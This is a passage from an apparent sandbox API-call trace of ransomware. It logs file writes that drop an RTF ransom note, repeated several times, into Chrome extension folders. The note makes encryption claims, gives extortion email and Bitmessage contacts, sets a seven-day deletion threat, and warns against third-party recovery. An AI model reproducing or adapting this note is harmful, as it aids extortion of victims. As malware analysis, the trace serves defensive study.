ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.054] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.055] CloseHandle (hObject=0x294) returned 1 [0285.055] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\#readme_eman#.rtf")) returned 0xffffffff [0285.055] GetLastError () returned 0x2 [0285.055] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 